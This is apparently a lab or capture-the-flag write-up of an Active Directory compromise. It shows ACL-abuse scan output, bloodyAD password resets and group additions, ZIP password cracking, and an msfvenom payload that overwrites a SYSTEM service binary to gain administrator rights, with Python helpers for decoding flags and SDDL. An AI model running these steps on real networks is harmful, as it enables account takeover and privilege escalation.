Target : Enterprise Read-only Domain Controllers [top | group]
DN : CN=Enterprise Read-only Domain Controllers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Denied RODC Password Replication Group [top | group]
DN : CN=Denied RODC Password Replication Group,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Allowed RODC Password Replication Group [top | group]
DN : CN=Allowed RODC Password Replication Group,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : RAS and IAS Servers [top | group]
DN : CN=RAS and IAS Servers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Group Policy Creator Owners [top | group]
DN : CN=Group Policy Creator Owners,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Domain Guests [top | group]
DN : CN=Domain Guests,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Domain Users [top | group]
DN : CN=Domain Users,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Cert Publishers [top | group]
DN : CN=Cert Publishers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Domain Computers [top | group]
DN : CN=Domain Computers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH AddMember
Target : Remote Desktop Users [top | group]
DN : CN=Remote Desktop Users,CN=Builtin,DC=404finance,DC=local
Rights : AddMember
Technique : Add any principal to the target group
Methods : add-member
Attack : Add yourself to Domain Admins or any privileged group.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : bf9679c0-0de6-11d0-a285-00aa003049e2
🟠 HIGH WriteUserAccountControl
Target : Guest [top | person | organizationalperson | user]
DN : CN=Guest,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Users [top | container]
DN : CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
════════════════════════════════════════════════════════════════════════════════
From the output, we observe that robert has ForceChangePassword privileges over the following three accounts:
melanie.kunz, jan.tresor, nina.inkasso
He can also add members to the Remote Desktop Users group, which is what grants RDP access to the DC.
Initially, I attempted to perform an ASREPRoasting attack against the webadmin and svc.services accounts. However, I was unable to crack the retrieved hashes. Consequently, I leveraged the ForceChangePassword privilege to reset the credentials of the three accounts listed above and authenticate as them. It is unclear whether other attack paths exist for this scenario.
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' set password melanie.kunz 'Password@123'
[+] Password changed successfully!
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' set password jan.tresor 'Password@123'
[+] Password changed successfully!
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' set password nina.inkasso 'Password@123'
[+] Password changed successfully!
To gain RDP access as these accounts, we add each of them to the Remote Desktop Users group using robert.graef's AddMember right over that group.
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' melanie.kunz
[+] melanie.kunz added to Remote Desktop Users
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' jan.tresor
[+] jan.tresor added to Remote Desktop Users
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' nina.inkasso
[+] nina.inkasso added to Remote Desktop Users
I RDP'd into all three accounts and enumerated their file systems.
No sensitive information was found in the melanie.kunz and nina.inkasso profiles.
However, in the jan.tresor profile I discovered deleted emails in the Recycle Bin, one of which contained credentials for Daniel Hoffmann.
Additionally, this email revealed that the svc.services account had been disabled by Robert Graef.
Since we have write privileges over that account's userAccountControl via robert.graef, we can re-enable it later.
Checking the recovered credentials …
> nxc smb 10.1.60.192 -u daniel.hoffmann -p 'Rem*************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\daniel.hoffmann:Rem**************
At this point, we have successfully gained access to the daniel.hoffmann account using the credentials recovered from the deleted email found in the Recycle Bin on jan.tresor's desktop.
Jump to webadmin
Again, a quick scan for dangerous ACL misconfigurations, this time for the rights daniel.hoffmann holds over domain objects (the scan is run with robert.graef's credentials and targets daniel's SID).
The output reveals that daniel.hoffmann has ForceChangePassword over the webadmin account.
> python3 aclhug.py --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' -t daniel.hoffmann
AD ACL Hunter
Time : 2026-06-22 18:19:24 EDT
User : robert.graef
Domain : 404finance.local
DC IP : 10.1.60.192
Base DN : DC=404FINANCE,DC=LOCAL
[*] Connecting...
[+] Connection established
[*] Resolving 'daniel.hoffmann'...
[+] SID : S-1-5-21-2956725473-317782918-2795636496-1109
[+] DN : CN=Daniel Hoffmann,CN=Users,DC=404finance,DC=local
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 255 objects for SID S-1-5-21-2956725473-317782918-2795636496-1109...
[████████████████████] 100% (255/255)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › daniel.hoffmann [user]
Summary: 🟠 HIGH: 1
🟠 HIGH ForceChangePassword
Target : webadmin [top | person | organizationalperson | user]
DN : CN=Alex Meier,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
════════════════════════════════════════════════════════════════════════════════
Our next step is to reset the webadmin account password using daniel.hoffmann's ForceChangePassword privilege, then use robert.graef's AddMember right to add webadmin to the Remote Desktop Users group. Finally, we establish an RDP session as webadmin and enumerate the file system.
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u daniel.hoffmann -p 'Rem**************' set password webadmin 'Password@123'
[+] Password changed successfully!
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' webadmin
[+] webadmin added to Remote Desktop Users
Jump to svc.services
While enumerating the webadmin file system, I discovered the IIS root directory located at C:\inetpub.
Inside, I identified two web application folders corresponding to services running on port 80 and port 5000 respectively.
The port 80 application appeared standard, however, the port 5000 application was of particular interest.
Revisiting the home page encountered during the initial reconnaissance phase, the description of Alex Meier, the web administrator, states:
Upon enumerating the port 5000 directory, a ZIP archive was discovered.
Next, we will transfer the ZIP archive to our attack machine and attempt to crack it, as it was found to be password protected upon extraction attempts on the target machine.
Attempts to crack the archive using the rockyou wordlist were unsuccessful.
Subsequently, I generated a custom wordlist from the web application using cewl, which successfully recovered the password.
> zip2john config_backup.zip > hash
> cewl http://10.1.60.192/ > passlist
> john hash --wordlist=passlist
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 131 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
D*************** (config_backup.zip/config.dat)
1g 0:00:00:00 DONE (2026-06-22 18:55) 12.50g/s 6375p/s 6375c/s 6375C/s CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)..One
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Upon extracting the ZIP archive, a file named config.dat was discovered, containing credentials for the svc.services account.
> cat config.dat
# Configuration Backup - Do not delete!
[ServiceUser]
username = svc.services
password = S3***************
host = WIN-SRV01
autostart = true
It is worth recalling that, as noted in the previously discovered email, the svc.services account is currently disabled. Therefore, we must first re-enable the account, then add it to the Remote Desktop Users group, and finally establish an RDP session.
Verifying the current userAccountControl attribute of svc.services:
As observed, the ACCOUNTDISABLE flag is set on svc.services, confirming that it is disabled.
Therefore, we must clear this flag to re-enable the account.
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' get object svc.services --attr userAccountControl
distinguishedName: CN=Service Account,CN=Users,DC=404finance,DC=local
userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
The following table outlines the most commonly referenced userAccountControl flags.
| Property Flag | Hexadecimal Value | Decimal Value | Description |
|---|---|---|---|
| SCRIPT | 0x0001 | 1 | The logon script will be run. |
| ACCOUNTDISABLE | 0x0002 | 2 | The user account is disabled. |
| HOMEDIR_REQUIRED | 0x0008 | 8 | The home folder is required. |
| LOCKOUT | 0x0010 | 16 | The account is locked. |
| PASSWD_NOTREQD | 0x0020 | 32 | No password is required. |
| PASSWD_CANT_CHANGE | 0x0040 | 64 | The user can't change the password. |
| ENCRYPTED_TEXT_PWD_ALLOWED | 0x0080 | 128 | The user can send an encrypted password. |
| TEMP_DUPLICATE_ACCOUNT | 0x0100 | 256 | An account for users whose primary account is in another domain. |
| NORMAL_ACCOUNT | 0x0200 | 512 | Default account type representing a typical user. |
| INTERDOMAIN_TRUST_ACCOUNT | 0x0800 | 2048 | Trust account for a system domain that trusts other domains. |
| WORKSTATION_TRUST_ACCOUNT | 0x1000 | 4096 | Computer account for a workstation or server that is a member of this domain. |
| SERVER_TRUST_ACCOUNT | 0x2000 | 8192 | Computer account for a domain controller that is a member of this domain. |
| DONT_EXPIRE_PASSWORD | 0x10000 | 65536 | Password should never expire. |
| MNS_LOGON_ACCOUNT | 0x20000 | 131072 | MNS logon account. |
| SMARTCARD_REQUIRED | 0x40000 | 262144 | Forces the user to log on using a smart card. |
| TRUSTED_FOR_DELEGATION | 0x80000 | 524288 | Account is trusted for Kerberos (unconstrained) delegation. |
| NOT_DELEGATED | 0x100000 | 1048576 | User security context is not delegated. |
| USE_DES_KEY_ONLY | 0x200000 | 2097152 | Restrict this principal to DES encryption types. |
| DONT_REQ_PREAUTH | 0x400000 | 4194304 | Account does not require Kerberos pre-authentication (AS-REP roastable). |
| PASSWORD_EXPIRED | 0x800000 | 8388608 | User password has expired. |
| TRUSTED_TO_AUTH_FOR_DELEGATION | 0x1000000 | 16777216 | Account may use Kerberos protocol transition (S4U2Self) to obtain tickets on behalf of other users (security-sensitive). |
| PARTIAL_SECRETS_ACCOUNT | 0x4000000 | 67108864 | Account is a Read-Only Domain Controller (RODC). |
The svc.services account has the following flags set, with a combined userAccountControl value of 66050:
- ACCOUNTDISABLE = 2
- NORMAL_ACCOUNT = 512
- DONT_EXPIRE_PASSWORD = 65536
2 + 512 + 65536 = 66050
To re-enable the account, the ACCOUNTDISABLE bit must be cleared, which gives a new value of 66048. Subtracting 2 is correct only because we have just confirmed that the bit is set; the safe general form is a bitwise clear (66050 & ~2), since subtracting a flag that is not set borrows into the neighbouring bits and silently changes other flags.
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' set object svc.services userAccountControl -v 66048
[+] svc.services's userAccountControl has been updated
Upon verification, the ACCOUNTDISABLE flag has been successfully cleared from the svc.services account.
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' get object svc.services --attr userAccountControl
distinguishedName: CN=Service Account,CN=Users,DC=404finance,DC=local
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
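As an added example (not code from the original writeup, and not bloodyAD's own code), the following Python decodes a userAccountControl value into flag names and clears or sets a flag with a bitmask rather than by subtraction. It runs offline on the value 66050 read back above; the flag table is the standard UF_* set behind the userAccountControl attribute, and the helper names are my own.

```python
from __future__ import annotations

# Added example, not code from the original writeup or from bloodyAD.
# Flag values are the standard UF_* constants behind userAccountControl;
# the helper names below are my own.
UAC_FLAGS: dict[str, int] = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "HOMEDIR_REQUIRED": 0x0008,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,
    "TEMP_DUPLICATE_ACCOUNT": 0x0100,
    "NORMAL_ACCOUNT": 0x0200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000,
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
    "PARTIAL_SECRETS_ACCOUNT": 0x4000000,
}
KNOWN_MASK = sum(UAC_FLAGS.values())


def decode_uac(value: int) -> list[str]:
    """Names of every flag set in value, lowest bit first (bloodyAD's order).
    Bits outside the known table are reported as UNKNOWN(0x..)."""
    names = [name for name, bit in sorted(UAC_FLAGS.items(), key=lambda kv: kv[1])
             if value & bit]
    unknown = value & ~KNOWN_MASK
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:x})")
    return names


def set_flag(value: int, name: str) -> int:
    """Set one flag; idempotent."""
    return value | UAC_FLAGS[name]


def clear_flag(value: int, name: str) -> int:
    """Clear one flag with a mask; a no-op if it was not set."""
    return value & ~UAC_FLAGS[name]


def subtract_flag(value: int, name: str) -> int:
    """The writeup's arithmetic: only correct when the flag is actually set."""
    return value - UAC_FLAGS[name]


def enable_account(value: int) -> int:
    """Value to write back with `bloodyAD set object <acct> userAccountControl -v N`."""
    return clear_flag(value, "ACCOUNTDISABLE")


if __name__ == "__main__":
    svc = 66050  # svc.services as read back: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
    print(svc, decode_uac(svc))
    enabled = enable_account(svc)
    print(enabled, decode_uac(enabled))
    # Subtracting on an already-enabled account borrows across the bitfield:
    # the account is disabled again and gains LOCKOUT and PASSWD_NOTREQD,
    # while NORMAL_ACCOUNT disappears.
    broken = subtract_flag(enabled, "ACCOUNTDISABLE")
    print(broken, decode_uac(broken))
    # The write-uac -> DONT_REQUIRE_PREAUTH -> ASREPRoast route from the ACL
    # output, expressed as the value you would write.
    roastable = set_flag(enabled, "DONT_REQ_PREAUTH")
    print(roastable, decode_uac(roastable))
```

Clearing with `value & ~flag` is idempotent, so it is safe to re-run or to apply to an account whose state you have not just verified; the subtraction shortcut is only safe immediately after reading the attribute, as the writeup does.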
Next, we will add svc.services to the Remote Desktop Users group to establish an RDP session and begin the privilege escalation phase.
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' svc.services
[+] svc.services added to Remote Desktop Users
Checking …
> nxc smb 10.1.60.192 -u svc.services -p 'S3***************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\svc.services:S3***************
Pwning Administrator
For this phase, after reviewing other writeups, it was apparent that the common approach involves abusing a misconfigured certificate template for privilege escalation.
However, I independently identified an alternative method, exploiting weak permissions on the svcstats service binary located at C:\Program Files\svcstats.
First, let us enumerate this service by answering the following questions:
- What privileges does this service run under?
sc.exe and Get-Service did not reveal the service at all; both enumerate through the Service Control Manager, which omits services whose DACL does not grant the caller SERVICE_QUERY_STATUS. So we went directly to the Windows Registry, where every service's configuration lives under HKLM\SYSTEM\CurrentControlSet\Services regardless of the permissions set on the service object itself.
PS C:\Users\svc.services> reg query "HKLM\SYSTEM\CurrentControlSet\Services" | findstr /i "svcstat"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svcstats
Next, extract the full service details.
PS C:\Users\svc.services> reg query "HKLM\SYSTEM\CurrentControlSet\Services\svcstats"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svcstats
Type REG_DWORD 0x10
Start REG_DWORD 0x2
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ C:\Program Files\svcstats\svcstats.exe
ObjectName REG_SZ LocalSystem
Description REG_SZ Service Statistics Monitor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svcstats\Security
The important field here is ObjectName = LocalSystem, confirming the service runs as SYSTEM.
On to the next question.
- What permissions does our current user, svc.services, have over the target binary?
PS C:\Users\svc.services> icacls "C:\Program Files\svcstats\svcstats.exe"
C:\Program Files\svcstats\svcstats.exe FINANCE404\svc.services:(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
The key finding is svc.services:(M). The (M) flag stands for Modify, which on a file means read, write, execute and delete; the entry carries no (I), so it was set explicitly on this file rather than inherited from the svcstats directory.
We cannot replace the service binary as a file, but we can overwrite the existing binary's contents in place, which is all we need!
Start Exploiting …
Since Windows Defender is active on the target, writing a reverse shell payload would be detected immediately. Instead, we can overwrite the binary with a custom executable that adds our current user to the Administrators group.
> msfvenom -p windows/x64/exec CMD="net localgroup administrators svc.services /add" -f exe -o svcstats.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 315 bytes
Final size of exe file: 7168 bytes
Saved as: svcstats.exe
Next, we need to transfer the payload to the target machine and overwrite the original service binary with it.
Binary size before:
Overwriting the original service binary.
PS C:\Users\svc.services> $sourceBytes = [System.IO.File]::ReadAllBytes("C:\Users\svc.services\Desktop\svcstats.exe")
PS C:\Users\svc.services> [System.IO.File]::WriteAllBytes("C:\Program Files\svcstats\svcstats.exe", $sourceBytes)
Binary size after:
The original service binary has been successfully overwritten !
Let us now verify that svc.services is still a standard user: nxc authenticates but prints no (Pwn3d!) marker, which it shows only when the account has local administrator rights on the target.
> nxc smb 10.1.60.192 -u svc.services -p 'S3****************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\svc.services:S3****************
Attempting to start the service with sc.exe fails. Note that it is the OpenService call that is denied, not StartService itself, which matters below.
C:\Users\svc.services>sc.exe start svcstats
[SC] StartService: OpenService FAILED 5:
Access is denied.
So let's look at the service's security descriptor (SDDL) to understand our rights.
C:\Users\svc.services>sc sdshow svcstats
D:(A;;CCLCSWLOCRRC;;;SY)(A;;SWRPWPDTLORC;;;S-1-5-21-2956725473-317782918-2795636496-1112)
Confirming our SID.
C:\Users\svc.services>whoami /user
USER INFORMATION
----------------
User Name SID
======================= =============================================
finance404\svc.services S-1-5-21-2956725473-317782918-2795636496-1112
Great! The SID matches exactly. Now decoding our ACE, SWRPWPDTLORC:
SW = SERVICE_ENUMERATE_DEPENDENTS, RP = SERVICE_START, WP = SERVICE_STOP, DT = SERVICE_PAUSE_CONTINUE, LO = SERVICE_INTERROGATE, RC = READ_CONTROL.
We hold SERVICE_START, but not LC (SERVICE_QUERY_STATUS) or CC (SERVICE_QUERY_CONFIG), which is also why sc query and Get-Service never listed the service. So why did sc start still fail?
OpenService is all-or-nothing: if any right in the requested access mask is not granted, the call fails with ERROR_ACCESS_DENIED (5). sc.exe start requests more than SERVICE_START alone, since it prints the service's state after starting it, and that requires SERVICE_QUERY_STATUS, a right this ACE does not grant.
The .NET ServiceController class, by contrast, opens a handle requesting only the right the operation needs: Start() opens the service with SERVICE_START and calls StartService, nothing more.
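As an added example, not code from the original writeup, here is a small Python decoder for the service SDDL string printed by sc sdshow above. It maps each two-letter access string to the SERVICE_* right it stands for, collects the rights the DACL grants to a given SID, and models OpenService's all-or-nothing check. The SDDL and SID are copied from the output above; group membership is deliberately not expanded, and the helper names are my own.

```python
from __future__ import annotations
import re

# Added example, not code from the original writeup. Service-specific rights
# (winsvc.h) and standard rights (winnt.h), keyed by their SDDL access
# strings; helper names are my own.
SDDL_ACCESS: dict[str, tuple[str, int]] = {
    "CC": ("SERVICE_QUERY_CONFIG", 0x0001),
    "DC": ("SERVICE_CHANGE_CONFIG", 0x0002),
    "LC": ("SERVICE_QUERY_STATUS", 0x0004),
    "SW": ("SERVICE_ENUMERATE_DEPENDENTS", 0x0008),
    "RP": ("SERVICE_START", 0x0010),
    "WP": ("SERVICE_STOP", 0x0020),
    "DT": ("SERVICE_PAUSE_CONTINUE", 0x0040),
    "LO": ("SERVICE_INTERROGATE", 0x0080),
    "CR": ("SERVICE_USER_DEFINED_CONTROL", 0x0100),
    "SD": ("DELETE", 0x00010000),
    "RC": ("READ_CONTROL", 0x00020000),
    "WD": ("WRITE_DAC", 0x00040000),
    "WO": ("WRITE_OWNER", 0x00080000),
}
# Well-known SID strings that sc sdshow abbreviates.
SID_ALIASES = {"SY": "S-1-5-18", "BA": "S-1-5-32-544", "AU": "S-1-5-11",
               "IU": "S-1-5-4", "SU": "S-1-5-6", "WD": "S-1-1-0"}
ACE_RE = re.compile(r"\(([^)]*)\)")

# Copied from the writeup's `sc sdshow svcstats` and `whoami /user` output.
SVCSTATS_SDDL = ("D:(A;;CCLCSWLOCRRC;;;SY)"
                 "(A;;SWRPWPDTLORC;;;S-1-5-21-2956725473-317782918-2795636496-1112)")
SVC_SID = "S-1-5-21-2956725473-317782918-2795636496-1112"


def decode_access(token: str) -> set[str]:
    """Access field of an ACE -> right names. Accepts the two-letter form
    (SWRPWPDTLORC) or a hex mask (0x14). Unknown pairs are kept as ?XX."""
    if token.lower().startswith("0x"):
        mask = int(token, 16)
        return {name for name, bit in SDDL_ACCESS.values() if mask & bit}
    if len(token) % 2:
        raise ValueError(f"odd-length access string: {token!r}")
    pairs = [token[i:i + 2] for i in range(0, len(token), 2)]
    return {SDDL_ACCESS[p][0] if p in SDDL_ACCESS else f"?{p}" for p in pairs}


def parse_dacl(sddl: str) -> list[dict]:
    """Split the D:(...)(...) part into {'allow', 'sid', 'rights'} dicts.
    Only plain allow (A) and deny (D) ACEs are modelled; a trailing S: SACL
    is ignored."""
    if not sddl.startswith("D:"):
        raise ValueError("expected a descriptor string starting with D:")
    dacl = sddl[2:].split("S:", 1)[0]
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"unexpected ACE layout: ({body})")
        ace_type, _flags, access, _obj, _inherit, sid = fields
        if ace_type not in ("A", "D"):
            continue
        aces.append({"allow": ace_type == "A",
                     "sid": SID_ALIASES.get(sid, sid),
                     "rights": decode_access(access)})
    return aces


def rights_for_sid(sddl: str, sid: str) -> set[str]:
    """Rights the DACL grants this exact SID (deny wins over allow).
    Simplification: group membership is not expanded, so rights held via a
    group ACE only show up if you ask for the group's SID."""
    allowed: set[str] = set()
    denied: set[str] = set()
    for ace in parse_dacl(sddl):
        if ace["sid"] == sid:
            (allowed if ace["allow"] else denied).update(ace["rights"])
    return allowed - denied


def open_service_would_succeed(sddl: str, sid: str, requested: set[str]) -> bool:
    """OpenService is all-or-nothing: every requested right must be granted,
    otherwise the call fails with ERROR_ACCESS_DENIED (5)."""
    return requested <= rights_for_sid(sddl, sid)


if __name__ == "__main__":
    print("svc.services:", sorted(rights_for_sid(SVCSTATS_SDDL, SVC_SID)))
    print("SYSTEM:      ", sorted(rights_for_sid(SVCSTATS_SDDL, "S-1-5-18")))
    # A caller asking for SERVICE_START only (what ServiceController.Start does):
    print("open START only:",
          open_service_would_succeed(SVCSTATS_SDDL, SVC_SID, {"SERVICE_START"}))
    # A tool that also wants to print the resulting state needs QUERY_STATUS too:
    print("open START|QUERY_STATUS:",
          open_service_would_succeed(SVCSTATS_SDDL, SVC_SID,
                                     {"SERVICE_START", "SERVICE_QUERY_STATUS"}))
```

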